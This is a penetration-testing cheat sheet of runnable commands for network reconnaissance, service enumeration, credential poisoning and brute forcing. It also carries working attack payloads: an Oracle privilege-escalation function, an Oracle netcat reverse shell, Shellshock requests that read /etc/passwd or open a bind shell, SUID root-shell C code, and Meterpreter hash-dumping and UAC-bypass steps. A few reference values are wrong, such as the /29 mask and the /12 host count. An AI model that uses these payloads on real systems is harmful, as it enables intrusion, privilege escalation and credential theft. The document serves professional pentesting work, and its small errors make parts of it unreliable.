This cheat sheet focus on Infrastructure and Network penetration testing. Web application testing is not covered extensively, except for a few SQLMap commands and basic web server enumeration. For comprehensive web application testing, consider the Web Application Hacker’s Handbook, it is best for both learning and reference.

If I’m missing any pen testing tools here, please let me know on LinkedIn.

Introduction
Pre-engagement
- Network Configuration
  - Set IP Address
  - Subnetting
OSINT
- Passive Information Gathering
  - DNS
DNS Zone Transfers
- Email
  - Simply Email
- Semi Active Information Gathering
  - Basic Finger Printing
  - Banner grabbing with NC
- Active Information Gathering
  - DNS Bruteforce
    - DNSRecon
  - Port Scanning
    - Nmap Commands
Enumeration & Attacking Network Services
- SAMB / SMB / Windows Domain Enumeration
  - Samba Enumeration
- LLMNR / NBT-NS Spoofing
  - Metasploit LLMNR / NetBIOS requests
  - Responder.py
- SNMP Enumeration Tools
  - SNMPv3 Enumeration Tools
- R Services Enumeration
  - RSH Enumeration
- Finger Enumeration
  - Finger a Specific Username
  - Solaris bug that shows all logged in users:
- rwho
TLS & SSL Testing
- testssl.sh
Vulnerability Assessment
Database Penetration Testing
- Oracle
- MSSQL
  - Bruteforce MSSQL Login
  - Metasploit MSSQL Shell
Network
- Plink.exe Tunnel
- Pivoting
  - SSH Pivoting
  - Meterpreter Pivoting
- TTL Finger Printing
- IPv4 Cheat Sheets
- VLAN Hopping
- VPN Pentesting Tools
- DNS Tunneling
  - Attacking Machine
BOF / Exploit
Exploit Research
- Searching for Exploits
- Compiling Windows Exploits on Kali
- Cross Compiling Exploits
- Exploiting Common Vulnerabilities
  - Exploiting Shellshock
Simple Local Web Servers
Mounting File Shares
HTTP / HTTPS Webserver Enumeration
Packet Inspection
Username Enumeration
- SMB User Enumeration
- SNMP User Enumeration
Passwords
- Wordlists
Brute Forcing Services
- Hydra FTP Brute Force
- Hydra POP3 Brute Force
- Hydra SMTP Brute Force
Password Cracking
- John The Ripper - JTR
Windows Penetration Testing Commands
Linux Penetration Testing Commands
Compiling Exploits
- Identifying if C code is for Windows or Linux
- Build Exploit GCC
- GCC Compile 32Bit Exploit on 64Bit Kali
- Compile Windows .exe on Linux
SUID Binary
- SUID C Shell for /bin/bash
- SUID C Shell for /bin/sh
- Building the SUID Shell binary
Reverse Shells
TTY Shells
- Python TTY Shell Trick
- Spawn Interactive sh shell
- Spawn Perl TTY Shell
- Spawn Ruby TTY Shell
- Spawn Lua TTY Shell
- Spawn TTY Shell from Vi
- Spawn TTY Shell NMAP
Metasploit Cheat Sheet
- Meterpreter Payloads
- Windows reverse meterpreter payload
- Windows VNC Meterpreter payload
- Linux Reverse Meterpreter payload
Meterpreter Cheat Sheet
Common Metasploit Modules
- Remote Windows Metasploit Modules (exploits)
- Local Windows Metasploit Modules (exploits)
- Auxilary Metasploit Modules
- Metasploit Powershell Modules
- Post Exploit Windows Metasploit Modules
ASCII Table Cheat Sheet
CISCO IOS Commands
Cryptography
- Hash Lengths
- Hash Examples
SQLMap Examples
Document Changelog

Pre-engagement

Network Configuration

Set IP Address

ifconfig eth0 xxx.xxx.xxx.xxx/24

Subnetting

ipcalc xxx.xxx.xxx.xxx/24 
ipcalc xxx.xxx.xxx.xxx 255.255.255.0 

OSINT

Passive Information Gathering

DNS

WHOIS enumeration

whois domain-name-here.com

Perform DNS IP Lookup

dig a domain-name-here.com @nameserver

Perform MX Record Lookup

dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG

dig axfr domain-name-here.com @nameserver

DNS Zone Transfers

Command	Description
`nslookup -> set type=any -> ls -d blah.com`	Windows DNS zone transfer
`dig axfr blah.com @ns1.blah.com`	Linux DNS zone transfer

Email

Simply Email

Utilize tools like Simply Email to efficiently identify online presence (e.g., GitHub, target websites). Employ proxies or throttling to avoid detection and CAPTCHAs.

git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss after gathering.

Semi Active Information Gathering

Basic Finger Printing

Manual finger printing / banner grabbing.

Command Description

Command	Description
`nc -v 192.168.1.1 25` `telnet 192.168.1.1 25`	Basic versioning / finger printing via displayed banner

nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Basic versioning / finger printing via displayed banner

nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>

Active Information Gathering

DNS Bruteforce

DNSRecon

DNS Enumeration Kali - DNSRecon

root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Port Scanning

Nmap Commands

For more commands, see the Nmap cheat sheet (link in the menu on the right).

Basic Nmap Commands:

Command	Description
`nmap -v -sS -A -T4 target`	Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
`nmap -v -sS -p--A -T4 target`	As above but scans all TCP ports (takes a lot longer)
`nmap -v -sU -sS -p- -A -T4 target`	As above but scans all TCP ports and UDP scan (takes even longer)
`nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X`	Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover
`ls /usr/share/nmap/scripts/* \| grep ftp`	Search nmap scripts for keywords

Some have inquired about the use of T4 scans. It’s crucial to exercise caution and consider the context. For external penetration testing, especially over the internet, T2 scans with TCP connect are often more prudent. The higher latency and potential bandwidth constraints of remote connections can make T4 scans less effective.

Internal penetration testing, particularly on low-latency networks with ample bandwidth, might benefit from the more detailed information provided by T4 scans. However, it’s essential to assess the target devices. Embedded devices, for example, may struggle with the intensity of T4 or T5 scans, leading to inconclusive results.

As a general best practice, opt for slower scans to minimize disruption. Alternatively, a quick scan of the top 1000 ports can provide a preliminary understanding, allowing you to initiate penetration testing while a more thorough, slower scan runs concurrently.

Nmap UDP Scanning

nmap -sU TARGET

UDP Protocol Scanner

git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:

./udp-protocol-scanner.pl -f ip.txt

Scan for a specific UDP service:

udp-proto-scanner.pl -p ntp -f ips.txt

Other Host Discovery

Other methods of host discovery, that don’t use nmap…

Command	Description
`netdiscover -r 192.168.1.0/24`	Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

Enumeration & Attacking Network Services

Penetration testing tools that spefically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration

Samba Enumeration

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Also see, nbtscan cheat sheet (right hand menu).

Command	Description
`nbtscan 192.168.1.0/24`	Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
`enum4linux -a target-ip`	Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Fingerprint SMB Version

smbclient -L //192.168.1.100

Find open SMB Shares

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   

Enumerate SMB Users

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID Cycling:

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:

use auxiliary/scanner/smb/smb_lookupsid

Manual Null session testing:

Windows:

net use \\TARGET\IPC$ "" /u:""

Linux:

smbclient -L //192.168.99.131

NBTScan unixwiz

Install on Kali rolling:

apt-get install nbtscan-unixwiz 
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoofing

Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests

Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response

Capture the hashes:

auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py

Alternatively you can use responder.

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0

Run Responder.py for the whole engagement

Run Responder.py for the length of the engagement while you're working on other attack vectors.

SNMP Enumeration Tools

A number of SNMP enumeration tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf

Command Description

Command	Description
`snmpcheck -t 192.168.1.X -c public` `snmpwalk -c public -v1 192.168.1.X 1\| grep hrSWRunName\|cut -d* * -f` `snmpenum -t 192.168.1.X` `onesixtyone -c names -i hosts`	SNMP enumeration

snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMP enumeration

SNMPv3 Enumeration Tools

Idenitfy SNMPv3 servers with nmap:

nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

Use Metasploits Wordlist

Metasploit's wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing list!).

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration

This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration

RSH Run Commands

rsh <target> <command>

auxiliary/scanner/rservices/rsh_login

rusers Show Logged in Users

rusers -al 192.168.2.1

rusers scan whole Subnet

rlogin -l <user> <target>

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration

finger @TARGET-IP

Finger a Specific Username

finger batman@TARGET-IP

Solaris bug that shows all logged in users:

finger 0@host  

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger 'a b c d e f g h'@sunhost 

rwho

Use nmap to identify machines running rwhod (513 UDP)

TLS & SSL Testing

testssl.sh

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html  

Vulnerability Assessment

Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:

netstat -tulpn

Database Penetration Testing

Attacking database servers exposed on the network.

Oracle

Install oscanner:

apt-get install oscanner

Run oscanner:

oscanner -s 192.168.1.200 -P 1521

Fingerprint Oracle TNS Version

Install tnscmd10g:

apt-get install tnscmd10g

Fingerprint oracle tns:

tnscmd10g version -h TARGET
nmap --script=oracle-tns-version 

Brute force oracle user accounts

Identify default Oracle accounts:

 nmap --script=oracle-sid-brute 
 nmap --script=oracle-brute 

Run nmap scripts against Oracle TNS:

nmap -p 1521 -A TARGET

Oracle Privilege Escalation

Requirements:

Oracle needs to be exposed on the network
A default account is in use like scott

Quick overview of how this works:

Create the function
Create an index on table SYS.DUAL
The index we just created executes our function SCOTT.DBA_X
The function will be executed by SYS user (as that’s the user that owns the table).
Create an account with DBA priveleges

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:

nmap --script=oracle-sid-brute 
nmap --script=oracle-brute 

How to identify the current privilege level for an oracle user:

SQL> select * from session_privs; 

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid 
curren_user is 
pragma autonomous_transaction; 
begin 
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;

Oracle priv esc and obtain DBA access:

Run netcat: netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));

Run the exploit with a select query:

SQL> Select * from session_privs;

You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:

drop index exploit_1337;

Get Oracle Reverse os-shell:

begin
dbms_scheduler.create_job( job_name    => 'MEH1337',job_type    =>
    'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
    SYSTIMESTAMP,enabled    => FALSE,auto_drop => TRUE); 
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell'); 
end; 

MSSQL

Enumeration / Discovery:

Nmap:

nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:

msf > use auxiliary/scanner/mssql/mssql_ping

Use MS SQL Servers Browse For More

Try using "Browse for More" via MS SQL Server Management Studio

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Network

Plink.exe Tunnel

PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

Pivoting

SSH Pivoting

ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting

TTL Finger Printing

Operating System	TTL Size
Windows	`128`
Linux	`64`
Solaris	`255`
Cisco / Network	`255`

IPv4 Cheat Sheets

Classful IP Ranges

E.g Class A,B,C (depreciated)

Class	IP Address Range
Class A IP Address Range	`0.0.0.0 - 127.255.255.255`
Class B IP Address Range	`128.0.0.0 - 191.255.255.255`
Class C IP Address Range	`192.0.0.0 - 223.255.255.255`
Class D IP Address Range	`224.0.0.0 - 239.255.255.255`
Class E IP Address Range	`240.0.0.0 - 255.255.255.255`

IPv4 Private Address Ranges

Class	Range
Class A Private Address Range	`10.0.0.0 - 10.255.255.255`
Class B Private Address Range	`172.16.0.0 - 172.31.255.255`
Class C Private Address Range	`192.168.0.0 - 192.168.255.255`
	`127.0.0.0 - 127.255.255.255`

IPv4 Subnet Cheat Sheet

Subnet cheat sheet, not really realted to pen testing but a useful reference.

CIDR	Decimal Mask	Number of Hosts
/31	`255.255.255.254`	`1 Host`
/30	`255.255.255.252`	`2 Hosts`
/29	`255.255.255.249`	`6 Hosts`
/28	`255.255.255.240`	`14 Hosts`
/27	`255.255.255.224`	`30 Hosts`
/26	`255.255.255.192`	`62 Hosts`
/25	`255.255.255.128`	`126 Hosts`
/24	`255.255.255.0`	`254 Hosts`
/23	`255.255.254.0`	`512 Host`
/22	`255.255.252.0`	`1022 Hosts`
/21	`255.255.248.0`	`2046 Hosts`
/20	`255.255.240.0`	`4094 Hosts`
/19	`255.255.224.0`	`8190 Hosts`
/18	`255.255.192.0`	`16382 Hosts`
/17	`255.255.128.0`	`32766 Hosts`
/16	`255.255.0.0`	`65534 Hosts`
/15	`255.254.0.0`	`131070 Hosts`
/14	`255.252.0.0`	`262142 Hosts`
/13	`255.248.0.0`	`524286 Hosts`
/12	`255.240.0.0`	`1048674 Hosts`
/11	`255.224.0.0`	`2097150 Hosts`
/10	`255.192.0.0`	`4194302 Hosts`
/9	`255.128.0.0`	`8388606 Hosts`
/8	`255.0.0.0`	`16777214 Hosts`

VLAN Hopping

Using NCCGroups VLAN wrapper script for Yersina simplifies the process.

git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh 

VPN Pentesting Tools

Identify VPN servers:

./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:

./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce

Use IKEForce to enumerate or dictionary attack VPN servers.

Install:

pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:

./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1

ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking

Identify VPN Servers
Enumerate with IKEForce to obtain the group ID
Use ike-scan to capture the PSK hash from the IKE endpoint
Use psk-crack to crack the hash

Step 1: Idenitfy IKE Servers

./udp-protocol-scanner.pl -p ike SUBNET/24

Step 2: Enumerate group name with IKEForce

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Step 3: Use ike-scan to capture the PSK hash

ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP

Step 4: Use psk-crack to crack the PSK hash

psk-crack hash-file.txt

Some more advanced psk-crack options below:

pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking

Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:

nmap –Pn -sV -p 1723 TARGET(S)

PPTP Dictionary Attack

thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS Tunneling

Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine

Installtion:

apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:

ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:

https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

dnscat --host <dnscat server_ip>

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

Command	Description
`searchsploit windows 2003 \| grep -i local`	Search exploit-db for exploit, in this example windows 2003 + local esc
`site:exploit-db.com exploit kernel <= 3`	Use google to search exploit-db.com for exploits
`grep -R "W7" /usr/share/metasploit-framework /modules/exploit/windows/*`	Search metasploit modules using grep - msf search sucks a bit

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker

./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

cat file (view file contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock run bind shell

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock reverse Shell

nc -l -p 443

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

Command	Description
`python -m SimpleHTTPServer 80`	Run a basic http server, great for serving up shells etc
`python3 -m http.server`	Run a basic Python3 http server, great for serving up shells etc
`ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start"`	Run a ruby webrick basic http server
`php -S 0.0.0.0:80`	Run a basic PHP http server

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

Command	Description
`mount 192.168.1.1:/vol/share /mnt/nfs`	Mount NFS share to `/mnt/nfs`
`mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs`	Mount Windows CIFS / SMB share on Linux at `/mnt/cifs` if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
`net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no`	Mount a Windows share on Windows from the command line
`apt-get install smb4k -y`	Install smb4k on Kali, useful Linux GUI for browsing SMB shares

HTTP / HTTPS Webserver Enumeration

Command	Description
`nikto -h 192.168.1.1`	Perform a nikto scan against target
`dirbuster`	Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

Command	Description
`tcpdump tcp port 80 -w output.pcap -i eth0`	tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

Command	Description
`python /usr/share/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX`	Enumerate users from SMB
`ridenum.py 192.168.XXX.XXX 500 50000 dict.txt`	RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

Command	Description
`snmpwalk public -v1 192.168.X.XXX 1 \|grep 77.1.2.25 \|cut -d” “ -f4`	Enmerate users from SNMP
`python /usr/share/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX`	Enmerate users from SNMP
`nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)`	Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

Command	Description
`/usr/share/wordlists`	Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

Command	Description
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V`	Hydra FTP brute force

Hydra POP3 Brute Force

Command	Description
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V`	Hydra POP3 brute force

Hydra SMTP Brute Force

Command	Description
`hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V`	Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

Password cracking penetration testing tools.

John The Ripper - JTR

Command	Description
`john --wordlist=/usr/share/wordlists/rockyou.txt hashes`	JTR password cracking
`john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`	JTR forced descrypt cracking with wordlist
`john --format=descrypt hash --show`	JTR forced descrypt brute force cracking

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

Command	Description
`process.h, string.h, winbase.h, windows.h, winsock2.h`	Windows exploit code
`arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h`	Linux exploit code

Build Exploit GCC

Compile exploit gcc.

Command	Description
`gcc -o exploit exploit.c`	Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

Command	Description
`gcc -m32 exploit.c -o exploit`	Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

Command	Description
`i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe`	Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c

For 32 bit:

gcc -m32 -o suid suid.c

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit Cheat Sheet

A basic metasploit cheat sheet that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see - Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

Command	Description
`set payload windows/meterpreter/reverse_tcp`	Windows reverse tcp payload

Windows VNC Meterpreter payload

Command Description

set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

Command	Description
`set payload linux/meterpreter/reverse_tcp`	Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

Command	Description
`upload file c:\\windows`	Meterpreter upload file to Windows target
`download c:\\windows\\repair\\sam /tmp`	Meterpreter download file from Windows target
`download c:\\windows\\repair\\sam /tmp`	Meterpreter download file from Windows target
`execute -f c:\\windows\temp\exploit.exe`	Meterpreter run .exe on target - handy for executing uploaded exploits
`execute -f cmd -c`	Creates new channel with cmd shell
`ps`	Meterpreter show processes
`shell`	Meterpreter get shell on the target
`getsystem`	Meterpreter attempts priviledge escalation the target
`hashdump`	Meterpreter attempts to dump the hashes on the target
`portfwd add –l 3389 –p 3389 –r target`	Meterpreter create port forward to target machine
`portfwd delete –l 3389 –p 3389 –r target`	Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

Command	Description
`use exploit/windows/smb/ms08_067_netapi`	MS08_067 Windows 2k, XP, 2003 Remote Exploit
`use exploit/windows/dcerpc/ms06_040_netapi`	MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
`use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index`	MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

Command	Description
`use exploit/windows/local/bypassuac`	Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

Command	Description
`use auxiliary/scanner/http/dir_scanner`	Metasploit HTTP directory scanner
`use auxiliary/scanner/http/jboss_vulnscan`	Metasploit JBOSS vulnerability scanner
`use auxiliary/scanner/mssql/mssql_login`	Metasploit MSSQL Credential Scanner
`use auxiliary/scanner/mysql/mysql_version`	Metasploit MSSQL Version Scanner
`use auxiliary/scanner/oracle/oracle_login`	Metasploit Oracle Login Module

Metasploit Powershell Modules

Command	Description
`use exploit/multi/script/web_delivery`	Metasploit powershell payload delivery module
`post/windows/manage/powershell/exec_powershell`	Metasploit upload and run powershell script through a session
`use exploit/multi/http/jboss_maindeployer`	Metasploit JBOSS deploy
`use exploit/windows/mssql/mssql_payload`	Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

Command	Description
`run post/windows/gather/win_privs`	Metasploit show privileges of current user
`use post/windows/gather/credentials/gpp`	Metasploit grab GPP saved passwords
`load mimikatz -> wdigest`	Metasplit load Mimikatz
`run post/windows/gather/local_admin_search_enum`	Idenitfy other machines that the supplied domain user has administrative access to
`run post/windows/gather/smart_hashdump`	Automated dumping of sam file, tries to esc privileges etc

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII	Character
`x00`	Null Byte
`x08`	BS
`x09`	TAB
`x0a`	LF
`x0d`	CR
`x1b`	ESC
`x20`	SPC
`x21`	!
`x22`	"
`x23`	#
`x24`	$
`x25`	%
`x26`	&
`x27`	`
`x28`	(
`x29`	)
`x2a`	*
`x2b`	+
`x2c`	,
`x2d`	-
`x2e`	.
`x2f`	/
`x30`	0
`x31`	1
`x32`	2
`x33`	3
`x34`	4
`x35`	5
`x36`	6
`x37`	7
`x38`	8
`x39`	9
`x3a`	:
`x3b`	;
`x3c`	<
`x3d`	=
`x3e`	>
`x3f`	?
`x40`	@
`x41`	A
`x42`	B
`x43`	C
`x44`	D
`x45`	E
`x46`	F
`x47`	G
`x48`	H
`x49`	I
`x4a`	J
`x4b`	K
`x4c`	L
`x4d`	M
`x4e`	N
`x4f`	O
`x50`	P
`x51`	Q
`x52`	R
`x53`	S
`x54`	T
`x55`	U
`x56`	V
`x57`	W
`x58`	X
`x59`	Y
`x5a`	Z
`x5b`	[
`x5c`	\
`x5d`	]
`x5e`	^
`x5f`	_
`x60`	`
`x61`	a
`x62`	b
`x63`	c
`x64`	d
`x65`	e
`x66`	f
`x67`	g
`x68`	h
`x69`	i
`x6a`	j
`x6b`	k
`x6c`	l
`x6d`	m
`x6e`	n
`x6f`	o
`x70`	p
`x71`	q
`x72`	r
`x73`	s
`x74`	t
`x75`	u
`x76`	v
`x77`	w
`x78`	x
`x79`	y
`x7a`	z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

Command	Description
`enable`	Enters enable mode
`conf t`	Short for, configure terminal
`(config)# interface fa0/0`	Configure FastEthernet 0/0
`(config-if)# ip addr 0.0.0.0 255.255.255.255`	Add ip to fa0/0
`(config-if)# ip addr 0.0.0.0 255.255.255.255`	Add ip to fa0/0
`(config-if)# line vty 0 4`	Configure vty line
`(config-line)# login`	Cisco set telnet password
`(config-line)# password YOUR-PASSWORD`	Set telnet password
